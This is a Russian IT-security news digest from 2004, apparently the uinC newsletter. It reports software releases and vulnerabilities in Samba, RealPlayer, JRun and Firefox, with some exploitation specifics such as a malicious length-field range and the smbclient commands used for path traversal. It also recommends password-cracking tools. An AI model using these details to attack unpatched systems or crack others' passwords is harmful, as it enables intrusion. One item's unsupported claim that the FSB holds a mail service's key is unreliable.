Компания JBoss выпустила JBoss Application Server 4.0 - первый, согласно ее заявлению, сервер приложений с открытым кодом, сертифицированный на совместимость с платформой J2EE 1.4. Продукт поставляется бесплатно по лицензии Lesser General Public License, которая, как заявляют в JBoss, является наиболее либеральной среди всех лицензий, регулирующих распространение открытых кодов. В компании особо подчеркивают модульность сервера, позволяющую изымать или добавлять различные компоненты. В JBoss Application Server реализована кластеризация Java-объектов, включая EJB-, JMS- и HTTP-объекты. Поддерживается технология Java Management Extensions. JBoss предлагает платные услуги по поддержке сервера приложений и обучению работе с ним.
"Открытые системы"

30/09/2004 15:53 Калужский хакер чистосердечно раскаялся
Управление ФСБ России по Калужской области завершило расследование уголовного дела в отношении Андрея Михеева, студента факультета информатики одного из калужских вузов. Как сообщили корреспонденту REGIONS.RU в пресс-службе УФСБ по Калужской области, он обвинялся по трем статьям Уголовного кодекса РФ: 272 - "Неправомерный доступ к компьютерной информации", 273 - "Создание, распространение и использование вредоносных программ для ЭВМ", 165- "Причинение имущественного ущерба". А.Михеев неправомерно использовал пароли доступа к сети Интернет различных крупных предприятий и организаций области, среди законных пользователей которых - органы государственной власти, режимные предприятия, редакции печатных изданий. Вина Михеева была полностью доказана. Вместе с тем, принимая во внимание, что обвиняемый сделал письменное заявление о чистосердечном раскаянии, во время предварительного расследования признал свою вину в совершенных преступлениях, способствовал их раскрытию, добровольно возместил в полном объеме причиненный имущественный ущерб, прокурором области было принято решение о прекращении уголовного дела Михеева в связи с его деятельным раскаянием.
Источник

30/09/2004 17:04 Выход Apache 2.0.52
ASF (Apache Software Foundation) выпущен очередная версия Вэб-сервера Apache ветви 2.0 - 2.0.52, cменившего недавно выпущенный 2.0.51. Выпуск новой версии связан с устранением уязвимости в обработке директивы Satisfy (применяется для осуществления доступа к запароленным ресурсам Вэб-сервера), о чём мы сообщали недавно в новостях. Попутно было устранено ещё несколько багов и добавлено несколько усовершенствований, например - сообщения об ошибках формируются теперь в формате HTML 2.0, устранение ошибки сегментации при работе с LDAP, устранение ошибки при обработке URI, содержащей код %2F при включении директивы AllowEncodedSlashes, добавлен флаг -l, предназначенный для использования локального времени вместо UTC при ротации файлов журналов и т.д. Полный список изменений доступен по адресу, приведённому ниже.
Изменения

1/10/2004 10:04 Патент на FAT объявлен недействительным
Благодаря усилиям образованной недавно группы PUBPAT (Public Patent Foundation), US Patent Office признал патент, выданный Microsoft на файловую систему FAT, недействительным. Это первые результаты деятельности PUBPAT в борьбе против современной системы software-патентов в США. Однако радоваться победе еще рано: Microsoft имеет возможность подать апелляцию, сообщает linux.org.ru.
Подробности

1/10/2004 10:39 Выход Java 1.5.0 (J2SE 5.0)
Sun Microsystems официально объявила о выходе новой версии своего ПО для поддержки и разработки Java-приложений (апплетов) - J2SE 5.0 (Java 2 Platform Standard Edition).
Подробности

1/10/2004 11:14 Microsoft начала обжалование приказа Еврокомиссии раскрыть исходные коды
Microsoft начала процедуру обжалования постановления Еврокомиссии, которая в марте этого года обязала корпорацию раскрывать при работе в Европе исходные коды своего программного обеспечения, чтобы сторонние разработчики имели возможность анализировать свои продукты на предмет совместимости. По мнению Еврокомиссии, Microsoft также злоупотребила своим монопольным положением на рынке, за что на нее был наложен штраф 497 миллионов евро. Представители Microsoft в четверг подали иск в суд первой инстанции в Люксембурге, заявив, что постановление Еврокомиссии нарушает право компании на коммерческую тайну. "Первый раз в истории конкуренции компании приказано самой описать свою секретную технологию и предоставить ее конкурентам", - заявил представитель Microsoft. Как сообщает BBC News, судебная инстанция должна дать ответ в течение нескольких недель.
Lenta.Ru

1/10/2004 11:28 Уязвимости в медиаплеерах
В медиаплеерах RealOne Player, RealPlayer и Helix Player обнаружены уязвимости. Разработчик, RealNetworks Inc., пишет о наличии трёх уязвимостей. Первые две уязвимости, охарактеризованные как критически опасные, могут использоваться злоумышленниками с целью выполнения произвольного кода на удаленном компьютере. Атака может быть осуществлена через сформированный особым образом RM-файл или через вредоносную веб-страницу. Еще одна дыра позволяет нападающему удалять на машине жертвы файлы, расположенные в каталогах с заранее известными названиями. Уязвимости подвержены: Helix Player 1.x, RealOne Player v1, RealOne Player v2, RealPlayer 10, RealPlayer 8, RealPlayer Enterprise. Для устранения уязвимости рекомендуют воспользоваться встроенной службой обновления.
Описание

1/10/2004 11:57 Sun продвигает OpenOffice в качестве стандарта
Компания Sun Microsystems поддержала усилия Европейского союза по стандартизации форматов офисных документов, в том числе предложение, реализация которого позволила бы легко переходить с документов в форматах Microsoft на те, что созданы при помощи программного обеспечения open-source. В недавнем письме в Европейскую комиссию президент Sun Джонатан Шварц сказал, что он согласен с рекомендацией отдела Европейской комиссии по обмену данными между администрациями (IDA) о принятии в качестве международного стандарта формата, используемого в OpenOffice.org, комплексе деловых программ open-source на базе продукта Sun StarOffice. Это предложение входит в руководящие материалы, выпущенные IDA в мае для решения накопившихся проблем в области обмена электронными документами. Организация по развитию стандартов структурированной информации (OASIS) уже работает над стандартизацией средств управления XML, применяемых в OpenOffice.org (OASIS Open Document Format). IDA рекомендует сделать следующий шаг и передать этот формат в Международную организацию по стандартизации (ISO) для утверждения в качестве международного стандарта. Поддержав предложение ISO, Шварц в своем письме отмечает, что представители Sun предложили эту идею членам OASIS. «Мы не контролируем… OASIS или ISO и не можем гарантировать успех, — пишет Шварц. — Но мы не предвидим никаких серьезных осложнений на данный момент, и я думаю, что можно надеяться: формат OASIS Open Office XML станет стандартом ISO». В отчете IDA рекомендуется также производителям ПО подготовить фильтры, позволяющие читать XML-документы, созданные в одном приложении, в других офисных приложениях. Шварц назвал это хорошей идеей и пообещал, что в следующие версии StarOffice и OpenOffice.org компания Sun добавит фильтры, позволяющие обмениваться документами на базе WordML и ExcelML, диалектов языка XML соответственно для работы с текстом и электронными таблицами от Microsoft.
ZDNet

1/10/2004 12:09 Описание уязвимости в Macromedia JRun 4
Ранее мы сообщали о наличии уязвимости в JRun-cервере от Macromedia и выпущенном компанией кумулятивном патче (модуль Macromedia JRun 4 ииспользуется для обеспечения работы с java-приложениями Вэб-сервера Apache0). Компания iDEFENSE выпустила детальное описание уязвимости. Согласно этому описанию, уязвимость присутствует в модуле mod_jrun (и mod_jrun20) для Apache. В функции WriteToLog выделяется фиксированный размер буфера для стека и не производится проверка вводимых данных. При включённой опции Verbose в httpd.conf существует возможность ввода пользовательских данных для передачи этой функции. Соответственно, при передаче поля параметров, длина которого превышает выделеннный объём памяти, происходит переполнение буфера с возможным выполнением произвольного кода. Для формирования подобного переполнения могут быть использованы поля заголовков HTTP-запроса, в частности, поле "Content-Type".
Описание

1/10/2004 13:34 Троян Binny использует дыру в SUN Java Runtime
Компания "Лаборатория Касперского" предупреждает о появлении первого Java-трояна, поражающего компьютеры, владельцы которых используют при навигации по Сети браузеры, в свою очередь использующие Java Runtime (Opera, Mozilla, IE etc.). Вредоносная программа Binny представляет собой Java-апплет для веб-страниц, эксплуатирующий уязвимость пакета обработки SUN Java Runtime (может быть подключён в вышеназванных браузерах). Апплет состоит из трех файлов с именами mein.class (размер 2031 байт), binny.class (размер 3464 байта) и beyond.class (размер 972 байта).
Описание

1/10/2004 13:52 Уязвимость в Samba
Всё той же iDEFENSE обнаружена уязвимость в ПО Samba (предоставление ресурсов UNIX-сервера для доступа в NetBIOS-сетях). Суть уязвимости сводится к некорректной работе подпрограммы перевода пути в DOS-соглашениям к UNIX. Присутствует в функциях unix_convert() и сheck_name() (также в unix_clean_name()). использзуя уязвимость удалённый злоумышленник может получить доступ к файлам за пределами директории, которая отдана для общего доступа (расшарена) в файле smb.connf. Для использования уязвимости может быть использован стандартный для *nix клиент smbclient с использованием команд "get", "put" и "dir". Подчёркивается, что подобная атака невозможна при задании в smb.conf опции 'wide links = no'. После сообщения об уязвимости командой разработчиков проекта Samba выпущены версии 2.2.12 и патч для версии 3.0.5.
Описание

1/10/2004 14:57 JPEG-вирус распространяется через чат
Вирус, использующий недавно найденную в программных продуктах Microsoft уязвимость при обработке графических файлов формата JPEG, распространяется через службу обмена многновенными сообщениями AOL. По словам экспертов института SANS (SysAdmin Audit Network Security), вирус еще не успел широко распространиться - институт располагает пока лишь двумя сообщениями о заражении. "Такое уже делали в прошлом, только с использованием HTML-кода, а не JPEG, - говорит Джоэнис Ульрих (Johannes Ullrich), технический директор центра по исследованию интернет-атак института SANS. – Это вирус, но он еще не успел распространиться". Вирус действует следующим образом: жертва получает сообщение через IM-службу AOL, которое перенаправляет ее на веб-сайт с инфицированными файлами изображений в формате JPEG. Сообщение выглядит следующим образом: "Check out my profile, click GET INFO!" («Проверь мой профайл, нажми на ПОЛУЧИТЬ ИНФОРМАЦИЮ»). Когда пользователь кликает на ссылку, на его компьютере автоматически запускается вредоносный код, содержащийся в инфицированной картинке. Далее зараженный компьютер автоматически рассылает то же сообщение по всему контакт-листу IM-службы AOL. Вредоносный код содержит также так называемый черный ход (backdoor) - утилиту удаленного администрирования, позволяющую злоумышленнику перехватить управление зараженным компьютером. Еще 29 сентября Микко Хиппонен (Mikko Hypponen) из компании F-Secure предупредил о том, что многим современным средствам антивирусной защиты будет сложно обнаружить зараженные файлы JPEG. Во-первых, антивирус по умолчанию проверяет лишь .exe-файлы. Пользователь может изменить настройки для поиска файлов JPEG, однако злоумышленники тоже могут изменить это расширение на 11 других, включая JPEG2 и ICON. Так что их поиск в корпоративной сети, по словам эксперта, займет немало времени и потребует значительных вычислительных ресурсов. Проблема еще и в том, что Internet Explorer сначала выполняет JPEG-файл, и лишь потом записывает его в свой кэш, так что антивирус не может обнаружить вредоносную картинку до заражения. "Это означает, что недостаточно проверять на вирус сам компьютер, - говорит эксперт. – Нужно сканировать на шлюзе, но это может значительно отразиться на пропускной способности сети".
CNews

1/10/2004 16:00 «Арбатек» шлет открытое письмо ИА Regnum
Вчера на сайте ИА Regnum была опубликована статья «Провайдеры: террористические сайты слишком выгодны». В связи с этим, Константин Листратов от имени "Арбатек" обратился с открытым письмом к руководству ИА Regnum и ко всем пользователям российского интернета. 29 сентября на страницах web-сайта информационного агенства Regnum в качестве комментария к новости о взломе хакерами сайта иракской террористической группировки «Единобожие и Джихад», была опубликована статья «Провайдеры: террористические сайты слишком выгодны». В статье со ссылкой на неизвестных провайдеров из Санкт-Петербурга утверждается следующее: «Террористические сайты будут всегда — они слишком выгодны для провайдеров. Некоторые из них, в погоне за прибылью могут закрывать глаза на содержание сайтов.» Далее, со ссылкой на газету «Деловой Петербург» приводится следующая информация: «сейчас большинство провайдеров зарабатывают не на хостинге, а на трафике, то есть на посещаемости ресурсов, размещенных на серверах провайдера». Господин Листратов ответил на сайте "Вебпланеты" на эти высказывания.
Письмо

2/10/2004 11:36 Журнал CHIP проверил антиспамерскую защиту бесплатной почты
Журнал CHIP опубликовал результаты экспресс-исследования надежности антиспамерских фильтров, используемых крупнейшими российскими бесплатными почтовыми службами. Объектами исследования стали почтовые сервисы Рамблера, Яндекса, Mail.ru, Newmail.ru и Hotbox.ru. Журналисты разослали по специально зарегистрированным бесплатным адресам рекламные письма, снабженные всеми известными спамерскими хитростями: случайными фразами в теме письма, "шумом" между словами и т.д. Результаты исследования CHIP приводит в виде результирующей таблицы. Исследователи отмечают, что эксперимент был не совсем чистым: для рассылки использовалось настоящее спамерское письмо, уже проходившее через бесплатные сервера и успевшее попасть в базы фильтров. Строго говоря, приведенные высокие результаты показывают эффективность борьбы почтовиков с долгоиграющими рассылками. Тем не менее, авторы статьи готовы констатировать большие успехи технологических способов борьбы со спамом.
Подробности и таблица

2/10/2004 12:02 Тенденции развития вредоносных программ, сентябрь 2004
"Лаборатория Касперского" опубликовала обзор событий в мире вредоносных компьютерных программ за прошедший месяц.
Обзор

2/10/2004 12:35 Sun хочет запатентовать Looking Glass?
Компания Sun Microsystems желает запатентовать трехмерный пользовательский интерфейс Looking Glass, сообщает OSNews. Это не было бы странным, если бы не один факт: некоторое время назад Sun опубликовала исходный код Looking Glass по GPL. Это значит, что разработчики Open Glass и его пользователи рискуют оказаться в неудобном положении. Официальных разъяснений от Sun Microsystems по этому поводу пока не поступало.
Подробности

2/10/2004 12:57 Уязвимости в Linux при работе с файлами BMP, XPM и ICO
Обнаружен ряд уязвимостей в приложениях под Linux. Первая связана с обработкой изображений в формате BMP различными приложениями. Уязвимость может быть использована для создания бесконечного цикла в различного рода приложениях, работающих с этим форматом. Вторая уязвимость тоже касается графики — на этот раз формата XMP, разработанного еще в 1989 году. При помощи нее злоумышленник способен вызвать переполнение буфера и выполнить злонамеренный код на стороне клиента. Обе перечисленные уязвимости кроются в использовании библиотеки GdkPixBuf, использующейся в множестве популярных приложений (например, в GNOME2). Последняя из обнаруженных уязвимостей связана с форматом ICO, применяющимся для создания ярлыков («иконок») и мини-иконок (fav-icon), показываемых браузерами перед адресной строкой. Это пожалуй самая опасная уязвимость, поскольку среднестатистический пользователь сталкивается с этим форматом десятки а то и сотни раз в день. Впрочем, создатели браузеров Mozilla уже успокоили пользователей, сообщив, что FireFox от этой уязвимости уже защищен.
nixp.ru

2/10/2004 13:30 Mozilla.org представляет новые версии своих продуктов
Разработчики открытого браузера Mozilla объявили о выходе Mozilla 1.8 Alpha 4. Судя по тому, что доступно в альфа-версии, Mozilla 1.8 станет важным шагом в развитии браузера. Разработчики обещают поддержку множества новых сетевых стандартов (в первую очередь, CSS 3.0). Реализован также улучшенный механизм блокирования всплывающих окон, переработана система выбора "горячих клавиш". Почтовый клиент тоже подвергся некоторой доработке: стали доступны виртуальные папки для сохранения результатов поиска, а в версию для Linux был добавлен встроенный модуль проверки орфографии. До выхода окончательной версии браузера разработчики планируют выпустить, по крайней мере, еще один альфа-релиз. Переработке также подвергся и IRC-клиент от авторов Mozilla. Chatzilla теперь носит номер 0.9.65. В новой версии исправлены около тридцати багов, и добавлены некоторые полезные функции, среди них: поддержка протокола SSL, некоторые новые пользовательские команды, улучшенная поддержка unicode (теперь Chatzilla понимает unicode в именах пользователей и ссылках).
"Компьюлента"

2/10/2004 13:52 ФСБ сертифицировала криптографические средства "Анкад"
Сертификаты Федеральной службы безопасности России получили продукты фирмы «Анкад». «Анкад» разрабатывает криптографические средства защиты информации. Сертифицированы следующие продукты:
- Аппаратно-программное средство криптографической защиты информации «Криптон-4/PCI», поддерживающее также функции ограничения доступа к компьютеру (сертификат № СФ/527–0719);
-Программное средство криптографической защиты информации(СКЗИ) «Crypton Emulator» (сертификат № СФ/114–0731)
- Программное средство криптографической защиты информации (СКЗИ) «Криптон-Шифрование», выполняющее функции шифрования (сертификат № СФ/110–0732).
Действие новых сертификатов распространяется до 1 августа 2007 г.
CNews

2/10/2004 14:27 Microsoft готовит премьеру MSN Messenger 7.0 beta
На следующей неделе группа специально отобранных бета-тестеров получит в свое распоряжение предварительную версию IM-клиента MSN Messenger 7.0. В числе тестировщиков, как сообщает InfoWorld, будут граждане США, Великобритании, Франции, Испании, Голландии и Южной Кореи. После того, как испытатели выскажут программистам Microsoft все, что они думают по поводу качества и функциональности этого продукта, компания подготовит уже обычную бета-версию, которую можно будет свободно скачать с сайта Microsoft. Помимо внедрения в программе загадочной «персонализированной среды обмена сообщениями», в новом IM-клиенте должны появиться инструменты для привлечения к себе внимания уснувшего или отвлекшегося на посторонние вопросы собеседника по чату, вроде функции «подмигивания», «потряхивания» и так далее. По всей видимости, перед тем, как делать далеко идущие обобщения, следует дождаться появления официальной версии программы. Тем не менее, пока складывается впечатление, что Microsoft старательно «навешивает» на свой Messenger опции, давно приевшиеся пользователям не только ICQ, но также и Yahoo!Messenger, и, очевидно, других, более экзотических программ.
Internet.Ru

3/10/2004 10:50 Борьбу со спамерами ведут гиганты интернета
Борьба со спамом - непрошенными рекламными сообщениями, засоряющими интернет, вступила в новый этап. В нее включились гиганты Всемирной паутины. С октября компании AOL, Yahoo, Hotmail, Earthlink и Comcast будут требовать с тех пользователей, который отправляют большие объемы сообщений по электронной почте, соблюдения определенных правил. Речь идет о внедрении этими пятью гигантами интернет-бизнеса технических стандартов, которые получили название "Sender Policy Framework" , также "паспорт отправителя" (Sender-ID). Отныне электронные сообщения, поступающие на серверы этих пяти компаний, в случае, если они не будут содержать оговоренные параметры, будут автоматически отфильтровываться как спам. С другой стороны, эти стандарты помогут тем организациям, которые на законных основаниях распространяют электронную рекламу, увеличить ее эффективность. Введение стандарта "паспорт отправителя" было предложено еще полгода назад корпорацией Microsoft, однако теперь его решили объединить со стандартом SPF. Как считают специалисты, к концу этого года примерно половина всех сообщений, генерируемых в США, будет соответствовать требованиями новых стандартов.
SecurityLab.Ru

3/10/2004 11:04 Лекарство от «слэшдот»-эффекта
Как известно, мелкие сайты могут не выдержать мощного наплыва посетителей, который возникает при «слэшдот»-эффекте. Авторы проекта Mirrordot дают таким сайтам шанс: система копирует сайт целиком и принимает удар на себя. Так называемый «слэшдот»-эффект — это один из специфических феноменов интернета, связанный с мощным всплеском посещаемости рядового веб-сайта после того, как ссылка на этот ресурс появлялась на ленте новостей популярного сетевого издания или блога. Термин, да и само явление возникли благодаря популярному информационному технологическому блогу Slashdot. Для «слэшдот»-эффекта характерно, что гигантский наплыв трафика нарастает стремительно, как снежный ком, фактически превращаясь в DoS-атаку, так что несчастный сайт, который никогда не испытывал такого наплыва посетителей, очень быстро становится недоступным или доступ к нему затрудняется из-за перегруженности сервера или недостаточной пропускной способности каналов связи. Новый проект Mirrordot создан с целью помочь маленьким сайтам, которые не могут выдержать «слэшдот»-эффект. Для этого система автоматически копирует содержание всех сайтов, ссылки на которые появляются на первой странице Slashdot. «Толстый» канал для быстрого копирования и хостинг для контента предоставляет крупный интернет-провайдер Deru Internet. Как и система кэширования Google, здесь каждая страница помещается во фрейм, чтобы показать, что это сохраненная копия. Через два дня сайт удаляется из кэша. Разработчиками системы являются специалисты из фирмы Edgeos, занимающейся компьютерной безопасностью. Они постоянно читают Slashdot и, как говорят в интервью Wired, сами постоянно страдают от «слэшдот»-эффекта.
Подробности

3/10/2004 11:12 SNAP/PE, бесплатный видео-драйвер от SciTech Software
SciTech Software, известный производитель универсальных видео драйверов, уже некоторое время предлагает к использованию бесплатную версию драйвера SNAP Personal Edition своей последней разработки - универсального драйвера SNAP (потомка SDD - SciTech Display Doctor), сообщает linux.org.ru. От Enterprise Edition персональная версия отличается только лицензией и поддержкой единственного видео-чипсета на выбор пользователя. Наряду с Linux, поддерживаются также операционные системы Windows и OS/2. Для получения драйвера необходимо пройти бесплатную регистрацию на сайте, указать операционную систему, выбрать требуемый видео-чипсет и нажать кнопку [Generate]. В течении нескольких секунд драйвер будет сгенерирован и доступен для скачивания. Позже по желанию выбор ОС/чипсета можно сменить и сгенерировать новый драйвер. Единственное ограничение на генерацию драйверов - до 5 штук в неделю.
Подробности

3/10/2004 11:26 DDoS-атака как средство подавления конкурента
Без своего сайта в Интернете не обходится сейчас практически ни одна организация. С его помощью менеджеры стараются привлечь новых клиентов, развивают новые системы оплаты и доставки товаров или услуг. Многие построили свой бизнес полностью в Интернете: сетевые форумы для общения, магазины, информационные агентства, газеты. По мнению киберпреступников, самое лучшее средство борьбы с виртуальными конкурентами, которое действует независимо от «жертвы», – DDoS-атака. Суть ее состоит в том, что хакер заставляет большое количество компьютерных систем слать бесконечные «мусорные» запросы одному или нескольким серверам, вызывая их перегрузку. Для этого хакер внедряет «безобидные» вирусы в обычные компьютеры. Эти программы не выполняют никаких функций до определенного, заданного заранее момента времени. После этого хакер активирует несколько тысяч вирусов, заставляя компьютеры обычных пользователей постоянно слать бессмысленные пакеты данных по одному и тому же адресу. Блокировка – далеко не единственный ущерб от DDoS-атаки. Организация, чей информационный ресурс постоянно недоступен, постепенно теряет свою репутацию. Посетители уходят к конкурентам. Существование сайта в этом случае теряет всякий смысл. Так, 16 января 2004 года после продолжительной DDoS-атаки интернет-казино «Триада» было вынуждено перенести свой сайт на новый хостинг. При этом правила работы на сайте сильно изменились. 18 февраля 2004 года, по сообщению пресс-службы компании «Мастерхост», началась распределенная Ddos-атака на серверы хостинг-провайдера. Паразитный трафик мешал нормальному соединению с рядом ресурсов, расположенных на технической площадке фирмы.
Подробности

3/10/2004 12:11 Описание уязвимости в RealPlayer
eEye Digital Security опубликовано подробное описание уязвимоти, обнаруженной в семействе плееров RealPlayer. Уязвимость присутствует в бибилиотеке pnen3260.dll, отвечающей за обработку перключений между .rm-файлами. Сформировав специальный .rm-файл, который вместе со SMIL-файлом может вызвать перезапись памяти кучи, злоумышленник может выполнить произвольный код в конексте пользователя, от имени которого был запущен плеер. Для формирования подобного файла необходимо задать поле длины 0xFFFFFFF8 - 0xFFFFFFFF. Список уязвимых версий плееров приводится. Как мы указывали ранее, обновление на сайте производителя уже выпущено.
Описание

3/10/2004 17:20 У HOTBOX.ru появился сертификат
На днях обновился почтовый сервис hotbox.ru. Теперь его основным доменным именем стало pochta.ru. Как шаг в положительном направлении хочется отметить, что у данного почтового сервиса наконец-то появился сертификат SSL-соединения, заверенный Thawte Consulting. Т.е. теперь почтовый клиент не ругается при установлении защищённого соединения. Разумеется, надо указывать в настройках почтовой программы, в качестве почтового сервера его обновлённое доменное имя. Это не мешает пользоваться почтовыми адресами, зарегистрированными на альтернативных доменных именах данного сервиса. Однако ранее самопровозглашённый сертификат hotbox содержал 1024-битный ключ криптоалгоритма RSA. В настоящее время, заверенный Thawte сертификат содержит всего лишь 512-битный ключ. Это удивительным образом перекликается с анонсированным более полугода назад выходом чипа для взлома 512-битных ключей RSA. Впрочем, хозяевам секретной части ключа - сервиса hotbox.ru/pochta.ru (читай ФСБ) - совершенно не обязательно взламывать код, когда его можно просто расшифровать. Поэтому для практических целей по-прежнему представляется выгодным пользоваться зарубежными бесплатными защищёнными почтовыми сервисами. Например https://freemail.web.de. Что же касается защиты от снифинга со стороны администратора локальной сети или интернет-провайдера - то, как уже говорилось выше, появление заверенного по всем правилам сертификата - это значительный шаг вперёд. Теперь злоумышленники не смогут использовать для подмены сертификата защищённого соединения и осуществления MIM-атаки распространённое программное обеспечение. Что же касается использования со стороны злоумышленников вышеуказанного чипа, - то в настоящий момент это находится выше финансовых возможностей подавляющего большинства любителей. (Порядка 1-10 Млн. $(?)). Автор новости - dimm_pc66_100@mail.ru.
UINC

3/10/2004 18:24 Уязвимость в Firefox
Mozilla Foundation сообщает о достаточно серьёзной уязвимости в выпускаемом компании браузере Firefox. Уязвимость позволяет удалённому злоумышленнику, убедившего посетителя загрузить специальный файл с Вэб-сервера, удалить всё содержимое в директории загрузки (обычно задаётся в настройках Firefox, либо запрашивается у пользователя при загрузке). В качестве рекомендации предлагается загрузить превью релиз - Firefox 0.10.1, либо загрузить специальный патч.
Подробности



Программы дня за прошедшую неделю:

27/09/2004 Total Commander FTP Password Ripper
Небольшая утилита для расшифровки паролей встроенного FTP-клиента в Total Commander (Windows Commander), хранящихся в файле настроек wcx_ftp.ini. Результат расшифровки может быть сохранен в .html файле.
ОС: All Win
Тип программы: Взломщики паролей

28/09/2004 PuTTY
Программа представляет собой многоплатформенный Telnet/SSH клиент с возможностью эмуляции xterm терминала.
ОС: Cross-platform
Тип программы: Сетевые утилиты

29/09/2004 MAC Changer
Программа, позволяющая легко изменять MAC адрес сетевой карты. Существует возможность замены на произвольный MAC адрес или утановить его выбрав из встроенной БД MAC адресов, в которой находится информация о более чем 6800 производителях.
ОС: Unix
Тип программы: MAC

30/09/2004 John the Ripper
Один из лучших по функциональным возможностям и скорости перебора паролей взломщик хэшей паролей. Поддерживает автоопределение типа хэша, позволяет подбирать пароль практически ко всем наиболее используемым алгоритмам: DES, BSDI, MD5, BF, AFS, LM и другим. Существует несколько режимов перебора, основные из них - это подбор пароля по словарю и по символьный перебор с использованием заданной маски.
ОС: Cross-platform
Тип программы: Взломщики паролей

1/10/2004 DJohn
Основное назначение этого программного продукта - созданией некой распределённой сети для ускорения процесса взлома пароля, который основан на алгоритме работы популярного взломщика John The Ripper. Управляет распределением работы и ресурсов сервер под управлением djohnd, он же занимается координацией работы клиентов (программа djohn).
ОС: Unix
Тип программы: Взломщики паролей

2/10/2004 NeTAMS
Эта программа выпоняется как фоновый сервис (демон) под управлением операционных систем Solaris, FreeBSD и Linux. Она собирает данные об IP-трафике, поступающие от вашего маршрутизатора на базе ПК/UNIX или Cisco, фильтрует, суммирует, сохраняет в HASH или SQL базу данных, создает SMTP/HTML отчеты для администратора сети. Возможно также применение гибких политик доступа и фильтрации, контроль доступа, квоты, внешняя авторизация, мониторинг, планировщик заданий и многое другое.
ОС: Unix
Тип программы: Мониторинг сети

3/10/2004 Baby FTP Server
Простейший FTP сервер, который может понадобиться, при необходимости быстро и легко организовать FTP-сервер на вашем компьютере. Для организации FTP-сервера необходимо просто запустить программу и указать в параметрах директорию, к которой требуется разрешить доступ, с заданными параметрами: разрешение создания директорий, разрешение download/upload файлов, разрешение на переименование и удаление файлов. Созданный таким образом FTP-сервер поддерживает только анонимные подключения. Главной особенностью программы является ее простота в использование и маленький размер дистрибутива.
ОС: All Win
Тип программы: FTP


Архив рассылки новостей:
http://uinc.ru/news/archive/


На этом пока все.
Всем удачи.
uinC Team
http://uinc.ru

P.S. Все предложения, замечания и просьбы оставлять здесь:
http://uinc.ru/news/sendnews.php

Любые материалы с нашего сайта или рассылки не могут быть скопированы без разрешения автора или администрации сервера uinC.ru